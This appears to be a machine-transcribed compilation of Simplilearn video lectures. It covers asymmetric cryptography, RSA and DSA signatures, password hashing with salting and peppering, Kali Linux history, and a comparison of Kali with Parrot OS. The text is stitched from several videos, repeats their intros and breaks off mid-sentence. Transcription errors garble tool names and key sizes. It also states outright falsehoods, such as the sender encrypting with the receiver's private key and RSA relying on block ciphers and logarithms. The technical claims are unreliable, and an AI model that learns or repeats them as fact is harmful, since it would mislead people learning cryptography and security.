decode all the information easily key sharing is a risk that will always exist when symmetric key cryptography is being used thankfully asymmetric key encryption has managed to fix this problem this is Baba from Simply Learn and welcome to this video on asymmetric key cryptography let’s take a look at what we are going to learn today we begin by explaining what asymmetric key cryptography is and how it works we take a look at its application and uses we understand why it’s called public key cryptography and then learn a little bit about RS encryption and then we learn about the advantages of asymmetric key cryptography over symmetric key cryptography let’s understand what asymmetric key cryptography is asymmetric encryption uses a double layer of protection there are two different keys at play here a private key and a public key a public key is used to encrypt the information pre-transit and a private key is used to decrypt the data post transit these pair of keys must belong to the receiver of the message the public keys can be shared via messaging blog posts or key servers and there are no restrictions as you can see in the image the two keys are working in the system the sender first encrypts the message using the receivers’s private key after which we receive the cipher text the cipher text is then transmitted to the receiver without any other key on getting the cipher text the receiver uses his private key to decrypt it and get the plain text back there has been no requirement of any key exchange throughout this process therefore solving the most glaring flaw faced in symmetric key cryptography the public key known to everyone cannot be used to decrypt the message and the private key which can decrypt the message need not be shared with anyone the sender and receiver can exchange personal data using the same set of keys as often as possible to understand this better take the analogy of your mailbox anyone who wants to send you a letter has access to the box and can easily share information with you in a way you can say the mailbox is publicly available to all but only you have access to the key that can open the mailbox and read the letters in it this is how the private key comes to play no one can intercept the message and read its contents since it’s encrypted once the receiver gets its contents he can use his private key to decrypt the information both the public key and the private key are generated so they are interlin and you cannot substitute other private keys to decrypt the data in another example if Alice wants to send a message to Bob let’s say it reads “Call me today.” She must use Bob’s public key while encrypting the message upon receiving the cipher message Bob can proceed to use his private key in order to decrypt the message and hence complete security is attained during transmission without any need for sharing the key since this type of encryption is highly secure it has many uses in areas that require high confidentiality it is used to manage digital signature so there is valid proof of a document’s authenticity with so many aspects of business transitioning to the digital sphere critical documents need to be verified before being considered authentic and acted upon thanks to asymmetric cryptography senders can now sign documents with their private keys anyone who needs to verify the authenticity of such signatures can use the sender’s public key to decrypt the signature since the public and the private keys are linked to each other mathematically it’s impossible to repeat this verification with a with duplicate keys document encryption has been made very simple by today’s standards but the background implementation follows a similar approach in blockchain architecture asymmetric key cryptography is used to authorize transactions and maintain the system thanks to its two key structures changes are reflected across the blockchain’s peer-to-peer network only if it is approved from both ends along with asymmetric key cryptography tamperproof architecture its non-repudiation characteristic also helps in keeping the network stable we can also use asymmetric key cryptography combined with symmetric key cryptography to monitor SSL or TLS encrypted browsing sessions to make sure nobody can steal up personal information when accessing banking websites or the internet in general it plays a significant role in verifying website server authenticity exchanging the necessary encryption keys required and generating a session using those keys to ensure maximum security instead of the rather insecure HTTP website format security parameters differ on a session by session basis so the verification process is consistent and utterly essential to modern data security another great use of the asymmetric key cryptography structure is transmitting keys for symmetric key cryptography with the most significant difficulty in symmetric encryption being key exchange asymmetric keys can help clear the shortcoming the original message is first encrypted using a symmetry key the key used for encrypting the data is then converted into the cipher text using the receivers’s public key now we have two cipher text to transmit to the receiver on receiving both of them the receiver uses his private key to decrypt the symmetry key he can then use it to decrypt the original information on getting the key used to encrypt the data while this may seem more complicated than just asymmetric cryptography alone symmetric encryption algorithms are much more optimized for vast amounts of data on some occasions encrypting the key using asymmetric algorithms will definitely be more memory efficient and secure you might remember us discussing why symmetric encryption was called private key cryptography let us understand why asymmetric falls under the public key cryptography we have two keys at our disposal the encryption key is available to everyone the decryption key is supposed to be private unlike symmetric ecryptography there is no need to share anything privately to have an encrypted messaging system to put that into perspective we share our email address with anyone looking to communicate with us it is supposed to be public by design so that our email login credentials are private and they help in preventing any data mishandling since there is nothing hidden from the world if they want to send us any encrypted information this category is called the public key cryptography there are quite a few algorithms being used today that follow the architecture of asymmetric cryptography none more famous than the RSA encryption rsa encryption is the most widely used encryption or public key encryption standard using asymmetric approach named after its founders Revest Shamir and Adelman it uses block ciphers to obscure the information if you are unfamiliar with how block ciphers work they are encryption algorithms that divide the original data into blocks of equal size the block size depends on the exact cipher being used once they are broken down these blocks are encrypted individually and later chained together to form the final cipher text widely considered to be the most secure form of encryption albeit relatively slower than symmetric encryption algorithms it is widely used in web browsing secure identification VPNs emails and other chat applications with so many variables in play there must be some advantages that give asymmetrically cryptography an edge over the traditional symmetric encryption methodologies let’s go through some of them there is no need for any reliable key sharing channel in asymmetric encryption it was an added risk in private key cryptography that has been completely eliminated in public key architecture the key which is made public cannot decrypt any confidential information and the only key that can decrypt doesn’t need to be shared publicly under any circumstance we have much more extensive key lengths in RSA encryption and other asymmetric algorithms like48 bit key and 496 bit keys larger keys are much harder to break into via brute force and are much more secure asymmetric key cryptography can use as a proof of authenticity since only the rightful owner of the keys can generate the messages to be decrypted by the private key the situation can also be reversed encryption is done using a private key and decryption is done by the public key which would not function if the correct private key is not used to generate the message hence proving the authenticity of the owner it also has a tamper protection feature where the message cannot be intercepted and changed without invalidating the private key used to encrypt the data consequently the public key cannot decrypt the message and it is easy to realize the information is not 100% legitimate when and where the case requires now that we have a proper revision let’s understand what digital signatures are before moving on to the algorithm the objective of digital signatures is to authenticate and verify documents and data this is necessary to avoid tampering and digital modification or forgery of any kind during the transmission of official documents they work on the public key cryptography architecture with one exception typically an asymmetric key system encrypts using a public key and decrypts with a private key for digital signatures however the reverse is true the signature is encrypted using a private key and is decrypted with the public key because the keys are inked together decoding it with the public key verifies that the proper private key was used to sign the document thereby verifying the signatures provenence let’s go through each step to understand the procedure thoroughly in step one we have M which is the original plain text message and it is passed onto a hash function denoted by H# to create a digest next it bundles the message together with the hash digest and encrypts it using the sender’s private key it sends the encrypted bundle to the receiver who can decrypt it using the sender’s public key once the message is decrypted it is passed through the same hash function each hash to generate a similar digest it compares the newly generated hash with the bundled hash value received along with the message if they match it verifies data integrity in many instances they provide a layer of validation and security messages through non-secure channel properly implemented a digital signature gives the receiver reason to believe that the message was sent by the claimed sender digital signatures are equivalent to traditional handwritten signatures in many respects but properly implemented digital signatures are more difficult to forge than the handwritten type digital signature schemes in the sense used here are cryptographically based and must be implemented properly to be effective they can also provide non-repudiation meaning that the signer cannot successfully claim that they did not sign a message while also claiming their private key remains secret further some non-repudiation schemes offer a timestamp for the digital signature so that even if the private key is exposed the signature is valid to implement the concept of digital signature in real world we have two primary algorithms to follow the RSA algorithm and the DSA algorithm but the latter is a topic of learning today so let’s go ahead and see what the digital signature algorithm is supposed to do digital signature algorithm is a FIPS standard which is a federal information processing standard for digital signatures it was proposed in 1991 and globally standardized in 1994 by the National Institute of Standards and Technology also known as the NIST it functions on the framework of modular exponentiation and discrete logarithmic problems which are difficult to compute as a force brute system unlike DSA most signature types are generated by signing message digest with the private key of the originator this creates a digital thumbrint of the data since just the message digest is signed the signature is generally much smaller compared to the data that was signed as a result digital signatures impose less load on processors at the time of signing execution and they use small volumes of bandwidth dsa on the other hand does not encrypt message digest using private key or decrypt message digest using public key instead it uses mathematical functions to create a digital signature consisting of two 160-bit numbers which are originated from the message digests and the private key dsas make use of the public key for authenticating the signature but the authorization process is much more complicated when compared with RSA dsa also provides three benefits which is the message authentication integrity verification and non-repudiation in the image we can see the entire process of DSF validation a plain text message is passed onto a hash function where the digest is generated which is passed onto a signing function signing function also has other parameters like a global variable G a random variable K and the private key of the sender the outputs are then bundled onto a single pack with the plain text and sent to the receiver the two outputs we receive from the signing functions are the two 160 bit numbers denoted by S and R on the receiver end we pass the plain text through the same hash function to regenerate the message digest it is passed on to verification function which has other requirements such as the public key of the sender global variable G and SNR received from the sender the value generated by the function is then compared to R if they match then the verification process is complete and data integrity is verified this was an overview of the way the DSA algorithm works we already know it depends on logarithmic functions to calculate the outputs so let us see how we can do the same in our next section we have three phases here the first of which is key generation to generate the keys we need some prerequisites we select a Q which becomes a prime divisor we select a prime number P such that P minus1 mod Q equal to zero we also select a random integer G which must satisfy the two formulas being mentioned on the screen right now once these values are selected we can go ahead with generating the keys the private key can be denoted by X and it is any random integer that falls between the bracket of zero and the value of Q the public key can be calculated as Y = G ^ X mod P where Y stands for the public key the private key can then be packaged as a bundle which comprises of values of P Q G and X similarly the public key can also be packaged as a bundle having the values of P Q G and Y once we’re done with key generation we can start verifying the signature and this generation repeat once the keys are generated we can start generating the signature the message is passed through a hash function to generate the digest H first we can choose any random integer K which falls under the bracket of 0 and Q to calculate the first 160 bit number of a signing function of R we use the formula G ^ K mod P into mod Q q similarly to calculate the value of the second output that is S we use the following formula that is shown on the screen the signature can then be packaged as a bundle having R and S this bundle along with a plain text message is then passed on to the receiver now with the third phase we have to verify the signature we first calculate the message digest received in the bundle by passing it through the same hash function we calculate the value of W U1 and U2 using the formulas shown on the screen we have to calculate a verification component which is then to be compared with the value of R being sent by the sender this verification component can be calculated using the following formula once calculated this can be compared with the value of R if the values match then the signature verification is successful and our entire process is complete starting from key generation to the signature generation all the way up to the verification of the signature with so many steps to follow we are bound to have a few advantages to boot this and we would be right to think so dsa is highly robust in the security and stability aspect when compared to alternative signature verification algorithms we have a few other ciphers that aim to achieve the simplicity and the flexibility of DSA but it has been a tough ask for all the other suits the key generation is much faster when compared to the RSA algorithm and such while the actual encryption and decryption process may falter a little in comparison a quicker start in the beginning is well known to optimize a lot of frameworks dsa requires less storage space to work its entire cycle in contrast its direct correspondent that is RSA algorithm needs a certain amount of computational and storage space to function efficiently this is not the case with DSA which has been optimized to work with weaker hardware and lesser resources the DSA is patented but NIST has made this patent available worldwide royalty-free a draft version of the speculation FIPS 1865 indicates that DSA will no longer be approved for digital signature generation but it may be used to verify signatures generated prior to the implementation date of that standard the RSA algorithm is a public key signature algorithm developed by Ron Rest Adi Shamir and Leonard Edelman the paper was first published in 1977 and the algorithm uses logarithmic functions to keep the working complex enough to withstand brute force and streamlined enough to be fast post deployment rsa can also encrypt and decrypt general information to securely exchange data along with handling digital signature verification let us understand how it achieved this we take our plain text message M we pass it through a hash function to generate the digest h which is then encrypted using the sender’s private key this is appended to the original plain text message and sent over to the receiver once the receiver receives the bundle we can pass the plain text message to the same hash function to generate a digest and the cipher text can be decrypted using the public key of the sender the remaining hashes are compared if the values match then the data integrity is verified and the sender is authenticated apart from digital signatures the main case of RSA is encryption and decryption of private information before being transmitted across communication challenge this is where the data encryption comes into play when using RSA for encryption and decryption of general data it reverses the key set usage unlike signature verification it receives the receivers’s public key to encrypt the data and uses the receivers’s private key in decrypting the data thus there is no need to exchange any keys in this scenario there are two broad components when it comes to RSA cryptography one of them is key generation key generation employs a step of generating the private and the public keys that are going to be used for encrypting and decrypting the data the second part is the encryption and decryption functions these are the ciphers and steps that need to be run when scrambling the data or recovering the data from the cipher text you will now understand each of these steps in our next subtopic keeping the previous two concepts in mind let us go ahead and see how the entire process works starting from creating the key pair to encrypting and decrypting the information you need to generate the public and private keys before running the functions to generate cipher text and plain text they use certain variables and parameters all of which are explained we first use two large prime numbers which can be denoted by p and q we can compute the value of n as n= to p into q and compute the value of zed as p minus1 into qus 1 a number E is chosen at random satisfying the following conditions and a number D is also selected at random following the formula E D mod Z equal to 1 and it can be calculated with the formula given below the public key is then packaged as a bundle with N and E and the private key is packaged as a bundle using N and B this sums up the key generation process for the encryption and decryption function we use the formula C and M the cipher text can be calculated as C = M ^ E mod N and the plain text can be calculated from the cipher text as C power D mod N when it comes to a data encryption example let’s take P and Q as 7 and 13 the value of N can be calculated as 91 if we select the value of E to be five it satisfy all the criteria that we needed to the value of D can be calculated using the following function which gives it as 29 the public key can then be packaged as 91A 5 and the private key can then be packaged as 91A 29 the plain text if it is 10 which is denoted by M cipher text can be calculated to the formula C= to M ^ E mod N which gives us 82 if somebody receives this cipher text they can calculate the plain text using the formula C to ^ D mod N which gives us the value of 10 as selected as our plain text we can now look at the factors that make the RSA algorithm stand out versus its competitors in the advantageous topics of this lesson rsa encryption depends on using the receivers’s public key so that you don’t have to share any secret key to receive the messages from others this was the most glaring flaw faced by symmetric algorithms which were eventually fixed by asymmetric cryptography structure since the key pairs are related to each other a receiver cannot intercept the message since they didn’t have the correct private keys to decrypt the information if a public key can decrypt the information the sender cannot refuse signing it with his private key without admitting the private key is not in fact private anymore the encryption process is faster than that of the DSA algorithm even if the key generation is slower in RSA many systems across the world tend to reuse the same keys so that they can spend less time in key generation and more time on actual cipher text management data will be tamperproof in transit since meddling with the data will alter the usage of the keys the private key won’t be able to decrypt the information hence alerting the receiver of any kind of manipulation in between the receiver must be aware of any third party who possesses the private key since they can alter the data mid-transit the cases of which are rather low imagine creating an account on a new website you provide your email address and set a password that you are confident and you would not forget what about the website owner how securely are they going to store your password for website administrators they have three alternatives they can either store the passwords in a plain text format they can encrypt the passwords using an encryption and decryption key or they can store the passwords in a hash value let’s have a look at each of these when a password is stored in plain text format it is considered to be the most unsafe option since anyone in the company can read your passwords a single hack and a data server breach will expose all the accounts credentials without needing any extra effort to counter this owners can encrypt the passwords and keep them in the servers as a second alternative but that would mean they also have to store the decryption key somewhere on their servers in the event of a data breach or the server hack both the decryption key and encrypted passwords would be leaked thus making it a single point of failure what if there was an option to store the passwords after scrambling them completely but with no way to decrypt them this is where hashing comes to play since only the hashed values are stored in the server no encryption is needed with no plain text passwords to protect your credentials are safe from the website administrators considering all the pros hashed passwords are the industry standard when it comes to storing credentials nowadays before getting too deep into the topic let’s get a brief overview of how hashing works hashing is the process of scrambling a piece of information or data beyond recognition we can achieve this by using hash functions which are essentially algorithms that perform mathematical operations on the main plain text the value generated after passing the plain text information through the hash function is called the hash value digest or in general just the hash of the original data while this may sound similar to encryption the major difference is hashes are made to be irreversible no decryption key can convert a digest back to its original value however a few hashing algorithms have been broken due to the increase in computational complexity of today’s new generation computers and processors there are new algorithms that stand the test of time and are still in use among multiple areas for password storage identity verification etc like we discussed earlier websites use hashing to store the user’s passwords so how do they make use of these hash passwords when a user signs up to create a new account the password is then run through the hash function and the resulting hash value is stored on the servers so the next time a user comes to login to the account the password he enters is passed through the same hash function and compared to the hash stored on the main server if the newly calculated hash is the same as the one stored on the website server the password must have been correct because according to hash functions terminology same inputs will always provide the same outputs if the hashes do not match then the password entered during login is not the same as the password entered during the signup hence the login will be denied this way no plain text passwords get stored preventing both the owner from snooping on user data and protecting users privacy in the unfortunate event of a data breach or a hack apart from password storage hashing can also be used to perform integrity checks when a file is uploaded on the internet the files hash value is generated and it is uploaded along with the original information when a new user downloads the file he can calculate the digest of the downloaded file using the same hash function when the hash values are compared if they match then file integrity has been maintained and there has been no data corruption since so much important information is being passed onto the hash function we need to understand how they work a hash function is a set of mathematical calculations operated on two blocks of data the main input is broken down into two blocks of similar size the block size is dependent on the algorithm that is being used hash functions are designed to be one way they shouldn’t be reversible at least by design some algorithms like the previously mentioned MD5 have been compromised but most secure algorithms are being used today like the SHA family of algorithms the digest size is also dependent on the respective algorithm being used md5 has a digest of 128 bits while SH 256 has a digest of 256 bits this digest must always be the same for the same input irrespective of how many times the calculations are carried out this is a very crucial feature since comparing the hash value is the only way to check if the data is untouched as the functions are not reversible there are certain requirements of a hash function that need to be met before they are accepted while some of them are easy to guess others are placed in order to preserve security in the long run the hash function must be quick enough to encrypt large amounts of data at a relatively fast pace but it also shouldn’t be very fast running the algorithm on all cylinders makes the functions easy to brute force and a security liability there must be a balance to allow the hash function to handle large amounts of data and not make it ridiculously easy to brute force by running through all the possible combinations the hash function must be dependent on each bit of the input the input can be text audio video or any other file extension if a single character is being changed it doesn’t matter how small that character may be the entire digest must have a distinctly different hash value this is essential to create unique digests for every password that is being stored but what if two different users are using the same password since the hash function is the same for all users both the digests will be the same this is called a hash collision you may think this must be a rare occasion where two users have exactly the same password but that is not the case we have techniques like salting that can be used to reduce these hash collisions as we will discuss later in this video you would be shocked to see the most used passwords of 2020 all of these passwords are laughably insecure and since many people use the same passwords repeatedly on different websites hash collisions risk are more common than one would expect let’s say the hash functions find two users having the same password how can they store both the hashes without messing up the original data this is where salting and peppering come to play salting is the process of adding a random keyword to the end of the input before it is passed on to the hash function this random keyword is unique for each user on the system and it is called the salt value or just the salt so even if two passwords are exactly the same the salt value will differ and so will their digest there is a small problem with this process though since the salt is unique for each user they need to be stored in the database along with the passwords and sometimes even in plain text to speed up the process of continuous verification if the server is hacked then the hashes will need to be brute forced which takes a lot of time but if they receive the salts as well the entire process becomes very fast this is something that peppering aims to solve peppering is the process of adding a random string of data to the input before passing them through the hash function but this time the random string is not unique for each user it is supposed to be common for all users in the database and the extra bit added is called the pepper in this case the pepper isn’t stored on the servers it is mostly hardcoded onto the website source code since it’s going to be the same for all credentials this way even if the servers get hacked they will not have the right pepper needed to crack into all the passwords many websites use a combination of salting and peppering to solve the problem of hash collision and bolster security since brute force takes such a long time many hackers avoid taking the effort the returns are mostly not worth it and the possible combinations of using both salting and peppering is humongous with cyber crime getting more and more complex by the day corporations are in the need of trained personnel in the field of cyber security ethical hacking and penetration testing had always been necessary for organizations and the general public to protect the system against malicious attackers however with the exponential growth in cyber attacks the necessity of being trained in ethical hacking is at an all-time high many such professionals tend to use Linux distributions for their penetration testing activities there are specific operating systems which are catered to ethical hackers these operating systems come pre-installed with the necessary tools and scripts required for ethical hacking probably the most famous operating system in this bracket is Kala Linux for today’s video we will learn about this distribution made by and for hackers we take you through the intricacies of its hardware and software specifications let’s take a look at the agenda for today we start by learning about Kali Linux and a basic explanation of its purpose we take a look at the history of Kali Linux from the story of its origin to its current day exploits next we learn a few distinct features of Kal Linux that make it an attractive choice for penetration testers worldwide moving on we take a look at the multiple ways we can install Kal Linux to start our journey in the world of penetration testing in the next few sections we compare it to an industry rival operating system by the name of Parrot Security operating system we take a look at the OS on a grassroots level next we learn about the standout features of Kali Linux and Parrot Security with their unique offerings we make a direct comparison between Kali and Parrot Security OS as far as their hardware specifications and allound usability is concerned we make a conclusion as to which operating system caters to which category of user in the next topic we take a detailed look at how we can install Kali Linux on a Windows 10 system using the VMware virtualization software moving on we go through some of the reasons why people should choose Kali Linux as their primary operating system when it comes to ethical hacking and penetration testing in the next

section we cover the five different phases of penetration testing where each stage is a crucial segment in the entire cycle of a ethical hacking campaign we also take a look at the most popular tools installed in Kal Linux that are used regularly by ethical hackers as a part of their professional work coming to a few live demonstrations we start by learning some Linux terminal basic commands set up proxy chains to maintain a privacy on the internet run a few end mapap scans to find information about our victims use Wireshark to detect insecure browser traffic traveling through HTTP web pages learn about Metasloit and its components and finally use Metasloit to hack into a Windows 10 machine and grant ourselves root access or the admin access which basically gives us the key to the entire machine it’s no secret that the majority of our internet usage is at the risk of being hacked be it via unsafe messaging applications or misconfigured operating systems to counteract this void of digital security penetration testing has become the norm when it comes to vulnerability assessment kali Linux is an operating system that has become a well-known weapon in this fight against hackers a Linux distribution that is made specifically for penetration testers kali Linux has layers of features that we will be covering in today’s lesson let’s take a look at the topics to be covered in this video we start by learning about Kali Linux and a basic explanation of its purpose we take a look at the history of Kali Linux from the story of its origin to its current day exploits next we learn a few distinct features of Kali that make it an attractive choice for penetration testers worldwide finally we take a look at the multiple ways we can install Kali Linux to start our journey in the world of penetration testing let’s start by learning about Kali Linux in general Kali Linux which is formerly known as Backtrack Linux is an open-source Linux distribution aimed at advanced penetration testing and security auditing it contains several hundred tools that are targeted towards various information security tasks such as penetration testing security research computer forensics and reverse engineering kal Linux is a multiple platform solution accessible and freely available to information security professionals and hobbyists among all the Linux distributions Kali Linux takes its roots from the Debian operating system debian has been a highly dependable and stable distribution for many years providing a similarly strong foundation to the Kali desktop while the operating system is capable of practically modifying every single part of our installation the networking components of Kali become disabled by default this is done to prevent any external factors from affecting the installation procedure which may pose a risk in critical environments apart from boosting security it allows a deeper element of control to the most enthusiastic of users we did not get Kali Linux since the first day how did it come into existence let’s take a look at some of its history kal Linux is based on years of knowledge and experience in building penetration testing and operating systems during all these project lifelines there have been only a few different developers as the team has always been small the first project was called WPEX which stands for White Hat NPIX as can be inferred from the name it was based on the NPIX operating system as its underlying OS opix had releases ranging from version 2.0 to 2.7 this made way for the next project which was known as WAX or the long hand being White Hat Slack the name change was because the base OS was changed from NOPIX to Slack wax started at version 3 as a Nord it carrying on from WPIX there was a similar OS being produced at the same time auditor security collection often being shorted to just auditor which was once again using NOPIX its efforts were combined with wax to produce backtrack backtrack was based on slackware from version 1 to version 3 but switched to Ubuntu later on with version 4 to version 5 using the experience gained from all of this Kali Linux came after Backtrackk in 2013 kali started off using Debian stable as the engine under the hood before moving to Debian testing when Kali Linux became a rolling operating system now that we understand the history and the purpose of Kali Linux let us learn a little more about its distinct features the latest version of Kali comes with more than 600 penetration tools pre-installed after reviewing every tool that was included in Backtrack developers have eliminated a great number of tools that either simply did not work or which duplicated other tools that provided the same or similar functionality the Kali Linux team is made up of a small group of individuals who are the only ones trusted to commit packages and interact with the repositories all of which is done using multiple secure protocols restricting access of critical code bases to external asset greatly reduces the risk of source contamination which can cause Kali Linux users worldwide a great deal of damage as a direct victim of cyber crime although penetration tools tend to be written in English the developers have ensured that Kali includes true multilingual support allowing more users to operate in their native language and locate the tools they need for the job the more comfortable a user feels with the intricacies of the operating system the easier it is to maintain a stronghold over the configuration and the device in general since ARMbased singleboard systems like the Raspberry Pi are becoming more and more prevalent and inexpensive the development team knew that Kali’s ARM support would need to be as robust as they could manage with fully working installations kali Linux is available on a wide range of ARM devices and has ARM repositories integrated with the mainline distributions so the tools for ARM are updated in conjunction with the rest of the distribution all this information is necessary for users to determine if Kal Linux is the correct choice for them if it is what are the ways that they can go forward with this installation and start their penetration testing journey the first way to use Kali Linux is by launching the distribution in the live USB mode this can be achieved by downloading the installer image file or the ISO file from the Kali Linux website and flashing it to a USB drive with a capacity of at least 8 GB some people don’t need to save the data permanently and a live USB is the perfect solution for such cases after the ISO image is flashed the thumb drive can be used to boot a fully working installation of the operating system with the caveat that any changes made to the OS in this mode are not written permanently some cases allow persistent usage in live USBs but those require further configuration than normal situations but what if the user wants to store data permanently in the installed OS the best and the most reliable way to ensure this is the full-fledged hard disk installation this will ensure the complete usage of the systems hardware capabilities and will take into account the updates and the configurations being made to the OS this method is supposed to override any pre-existing operating system installed on the computer be it Windows or any other variant of Linux the next alternative route for installing Kal Linux would be to use virtualization software such as VMware or Virtual Box the software will be installed as a separate application on an already existing OS and Kali Linux can be run as an operating system in the same computer as a window the hardware requirements will be completely customizable starting with the allotted RAM to the virtual hard capacity the usage of both a host and guest operating system like Kal Linux allows users a safe environment to learn while not putting their systems at risk if you want to learn more about how one can go forward with this method we have a dedicated video where Kali Linux is being installed on VMware while running on a Windows 10 operating system you can find the link in the description box to get started with your very own virtual machine the final way to install Kali Linux is by using a dual boot system to put it in simple words the Kali Linux OS will not be overwriting any pre-installed operating system on a machine but will be installed alongside it when a computer boots up the user will get a choice to boot into either of these operating systems many people prefer to keep both the Windows and Kali Linux installed so the distribution of work and recreational activities is also allotted effectively it gives users a safety valve should their custom Linux installation run into any bugs that cannot be fixed from within the operating system professionals in security testing penetration testing and ethical hacking utilize Linux as their preferred operating system provides several configurable distributions that Miu may configure based on your end use kali Linux and Parrot OS are two popular penetration testing distributions while these operating systems each have unique offerings the overall choice can differ between personnel thanks to their various tools and hardware specifications today we will look at both these distributions and settle on the perfect choice for each type of user let’s go through the agenda for this video we will learn about Kali Linux and pilot security OS from scratch while understanding their primary selling points as a Linux distribution catered towards penetration testers next we know about some features of these operating systems that stand out of their package finally we directly compare Kal Linux and Par security OS thereby making a clear-cut conclusion on which OS is perfect on a per requirement basis so let’s start by learning about Kal Linux from a ground level kal Linux which is formerly known as Backtrack Linux is an open-source Linux distribution aimed at advanced penetration testing and security auditing it contains several hundred tools targeted towards various information security tasks such as penetration testing security research computer forensics and reverse engineering kali Linux is a multiplatform solution accessible and freely available to information security professionals and hobbyists among all the Linux distributions Kal Linux takes its roots from the Debian operating system debian has been a highly dependable and a stable distribution for many years providing a similarly strong foundation to the Kali Linux desktop while the operating system can practically modify every single part of our installation the networking components of Kali Linux come disabled by default this is done to prevent any external factors from affecting the installation procedure which may pose a risk in critical environments apart from boosting security it allows a more profound element of security control to the most enthusiastic of users now let’s take a look at Parrot security operating system parrot Security OS is a Debian based Linux distribution with an emphasis on security privacy and development it is built on the Demian’s testing branch and uses a custom hardened Linux kernel parrot security contains several hundred tools targeted towards tasks such as penetration testing computer forensics reverse engineering and security research it is seen as a generally lightweight distribution that can work under rigorous hardware and software specifications it features a distinct forensics mode that does not mount any of the systems hard disks or partitions and has no influence on the host system making it much more stealthy than its regular occurrence this mode is used on the host system to execute forensic procedures a rolling release is a paradigm in which software upgrades are rolled out constantly rather than in batches of versions in software development this ensures that the software is constantly up to date a rolling release distribution such as pirate security OS follows the same concept it provides the most recent Linux kernel and software versions as soon as they become available with a basic introduction to the operating systems out of the way let us take a look at the unique features of both Kali Linux and Parrot Security OS the latest version of Kali Linux comes with more than 600 penetration tools pre-installed after reviewing every tool included in Backtrack developers have eliminated a significant number of tools that either simply did not work or duplicated other tools that provided the same and similar functionality the Kali Linux team comprises a small group of individuals who are the only ones trusted to commit packages and interact with the repositories all of which is done using multiple secure protocols restricting access of critical code bases to external assets dramatically reduces the risk of source contamination which can cause Kali Linux users worldwide a great deal of damage as a direct victim of cyber crime although penetration tools tend to be written in English the developers have ensured that Kali includes proper multilingual support allowing more users to operate in the native language and locate the tools they need for the job the more comfortable a user feels with the intricacies of the operating system the easier it is to maintain a stronghold over the configuration and the device in general since ARMbased single board systems like the Raspberry Pi are becoming more prevalent and inexpensive the development team knew that Kali’s ARM support would need to be as robust as they could manage with fully working installations kali Linux is available on a wide range of ARM devices and has ARM repositories integrated with the mainline distribution so the tools for ARM are updated in conjunction with the rest of the distribution let’s take a look at some of the features of Parrot Security operating system now along with a giant catalog of scripts Parrot Security OS has its own hardened Linux kernel modified explicitly to provide as much security and resistance to hackers as possible in the first line of defense the configurations in the operating system act as the second gateway taking care of malicious requests and dropping them off this is particularly beneficial since should there be a scenario where the latex Linux kernel is causing some particular issue the Parrot OS development team will most likely iron it out first before passing it on as an update if the custom hard kernel wasn’t recent enough PAR security developers managed to install more hacking tools and scripts to ensure a smooth transition for the Kali Linux users all the tools you find in Kali are present in parent to us and a few extra ones for good measure and this has been achieved while keeping roughly the same operating system size between both of them however it’s not all productivity points for parrot OS they provide a choice between two different desktop environments mate which comes pre-installed by default and KDE for those unfamiliar with Linux terminology you can think of desktop environments as the main UI for a distribution being highly modular in nature one can use parrot security OS while adding another desktop environment that they find appealing while Kal Linux has only a single option parrot security has provided two optimized builds with mate desktop and KD desktop one of the primary advantages of Parrot OS over Kali Linux is that it’s relatively lightweight this implies that it takes significantly less disk space and computing power to function correctly with as little as 320 MB of RAM required in reality Parrot OS is designed to operate successfully off a USB stick but Kali Linux does not work well from a USB Thrive and is generally installed in a virtual machine pirate OS is more of a niche distribution if you’re searching for something lighter than Kal Linux features are great but what about performance real world metrics let us compare both these operating systems directly with respect to their hardware specifications and usability in the end we can decide on what distribution is fit for each type of user for our first point of comparison let’s take a look at the RAM required for optimum performance of the operating system which is highly essential when trying to crack hashes or something of similar nature ram usage is a very important facet while Kali Linux demands at least 1 GB of RAM Paris security can operate optimally with a minimum of 320 MB of RAM for correctly displaying graphical elements kali Linux requires GPU based acceleration while this is not the case with parro security OS which doesn’t require any graphical acceleration needed from the user side once these operating systems are installed on VMware using the live boot ISOs they take up a minimum amount of hard disk storage both of these operating systems have a recommended disk storage of minimum of 20 GB in Kali Linux and a minimum of 15 GB in par security so they can install all the tools necessary in the ISO file when it comes to the category and the selection of tools Kal Linux has always been the first in securing every single tool available for hackers in the penetration testing industry parrot security on the other hand has managed to take it up a notch while specializing in wireless pen testing Parrot security makes it a point that all the tools that Kali Linux provides has been included in the ISO while simultaneously adding some extra tools that many users will have to install from third party sources in Kali Linux being a decade old penetration testing distribution Kali Linux has formed up a very big community with strong support signature parcurity on the other hand is still growing and it is garnering much more interest among veteran penetration testers and ethical hackers a primary drawback of Kal Linux is the extensive hardware requirement to perform optimally it requires higher memory than pyro security it also needs graphical acceleration while demanding more virtual hard disk storage parrot security on the other hand was initially designed to run off a USB drive directly thereby requiring very minimal requirements from a hardware perspective like just 320 MB of RAM and no graphical acceleration needed this means PAR security is much more feasible for people who are not able to devote massive resources to either their virtual machine or on their laptop hard disk directly with the comparison done between both of these operating systems let’s take a look at the type of users both of these are catered to one can go with Kala Linux if they want the extensive community support offered by its users if they want to go with a trusted development team that have been working on this distribution since many years if they have a powerful system which can run Kal Linux optimally without having to bottleneck performance and if they are comfortable with a semi-professional environment which may or may not be very useful for new beginners one can decide to go with parrot security if they want to go with a very lightweight and lean distribution that can run pretty much on all systems it also has a lot of tools pre-installed and some of them are not even present on Kal Linux it is much more suitable for underpowered rigs where users do not have a lot of hardware resources to provide to the operating system and thereby it is much more feasible for people with underpowered laptops or no graphical acceleration compared to Kal Linux Parc’s desktop environment is also relatively easier to use for new beginners for people who are just getting into ethical hacking Parent Security does a relatively better job of introducing them to the operating system and to the various tools without having to dump them into the entire intricacies the installation of Kali Linux there are multiple ways to install Kali Linux we can either install it on a normal hard drive in a virtual machine software such as VMware or Virtual Box or we can do that in hard bare metal machines now for the convenience of explanation we’re going to install Kali Linux today on a virtual machine software known as VMware vmware is able to run multiple operating systems on a single host machine which in our case is a Windows 10 system to get started with Kali Linux installation we have to go to the website to download an image file we go to get Kali and as you can see there are multiple platforms on which this operating system can be inverted as per our requirement we’re going to go with the virtual machine section as you can see it is already recommended by the developers this is the download button which will download a 64-bit ISO file we can download 32-bit but that is more necessary for hard metal machines or if you’re going to use it for older devices which do not support 64-bit operating systems yet after clicking on the download button we can see we have a vinro archive which will have the ISO files for now we have downloaded the ISO file and it is already present with me so we can start working on the VMware side of things once the ISO file is downloaded we open up VMware Workstation go to file and we create a new virtual machine in these two options it is highly recommended to go with the typical setup rather than the custom one the custom is much more advanced and requires much more information from the user which is beneficial for developers and people who are wellversed with virtualization software but for 90% of the cases typical setup will be enough here we can select the third option which will be I will install the operating system later in some operating systems we can use the ISO file here directly and VMware will install it for us but right now in the case of Kal Linux the third option is always the safest kal Linux is a Linux 